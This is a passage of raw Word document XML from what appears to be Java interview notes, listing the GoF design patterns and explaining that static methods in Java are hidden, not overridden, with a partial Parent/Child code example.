    <w:p w14:paraId="059D375D" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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ototype</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the kind of objects to create using a prototypical instance and creates new objects by copying this prototype.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B618E26" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D8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Structural Patterns (7 patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68973DD1" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D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se patterns deal with object composition, helping to form large structures while keeping them flexible and efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B5811" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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dapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows incompatible interfaces to work together by converting one interface to another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE2F2F" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ridge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Decouples abstraction from implementation so that the two can vary independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C501F4" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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osite</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Composes objects into tree-like structures to represent part-whole hierarchies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E8CC5A" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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corator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to add new functionality to an object dynamically without altering its structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF462F3" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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acade</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a simplified interface to a complex system of classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3384DE58" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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lyweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces the cost of creating and manipulating a large number of similar objects by sharing common data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B529630" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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oxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a surrogate or placeholder for another object to control access to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A585619" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D8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Behavioral Patterns (11 patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBF2CC" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D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se patterns deal with object interaction, how objects communicate with each other, and how responsibilities are assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCE3D5F" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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hain of Responsibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows passing a request along a chain of handlers, with each handler either processing the request or passing it along to the next handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215475F" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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mand</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Encapsulates a request as an object, thereby allowing for parameterization of clients with different requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555FC387" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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terpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines a grammatical representation for a language and provides an interpreter to evaluate sentences in the language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCFED6" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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terator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a way to access elements of an aggregate object sequentially without exposing its underlying representation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A294E0E" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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diator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines an object that coordinates interaction between a group of objects to reduce coupling between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA441A8" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ento</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows capturing and externalizing an object's internal state so that it can be restored later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177AA50" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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bserver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows a subject to notify observers about changes to its state, facilitating a publish-subscribe model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CDA890" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows an object to alter its behavior when its internal state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC86C8F" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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rategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines a family of algorithms, encapsulates each one, and makes them interchangeable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F99864" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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emplate Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the structure of an algorithm in the superclass, allowing subclasses to implement specific steps of the algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63582A7D" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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isitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows adding further operations to objects without having to modify them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862E868" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D8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 of GoF Design Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157AC64F" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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reational Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 5 patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22168716" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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ructural Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 7 patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55492E48" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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havioral Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 11 patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73817172" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D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us, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>23 design patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are commonly recognized in Java and object-oriented design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA14D4" w14:textId="77777777" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="00CA2D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te</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These patterns are a guideline for solving common design problems. Some might be more applicable in certain scenarios, and not all of them are always needed in every application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC4304" w14:textId="15ED5D90" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CA2D8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409C592">
          <v:rect id="_x0000_i1162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A5A4CF" w14:textId="2DB42B60" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="005A4248">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc196307518"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we override the static method</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="6BAFAF6C" w14:textId="661A4B3A" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529" w:rsidP="00855EAC">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static methods cannot be overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the traditional sense. However, they can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by defining a static method with the same signature in a subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9BA58" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529" w:rsidP="0036652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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9EA267" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 Hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If a subclass defines a static method with the same name and signature as a static method in the parent class, it doesn't override the parent class's method, but it hides it. This is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C91A7D" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Static Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods are bound at compile-time, not runtime. This means that the method that gets called is determined at compile-time based on the reference type, not the object type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A1BC9" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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olymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods do not participate in runtime polymorphism because they are resolved during compile-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D8907E" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529" w:rsidP="0036652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69EEAC4D" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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are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454FF23" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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displ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BCC8A2D" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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tatic method in Parent class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DDBD7D" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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5BB0F6B" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B5FC1" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA532EC" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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hil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xtend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are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E9F7056" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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his is method hiding, not overriding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A55C9A" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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displ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3DE2CC2" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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tatic method in Child class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67B36A" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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E5AD868" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CBAAA" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501DE08" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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es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3AF9D51" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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333000C" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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arent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
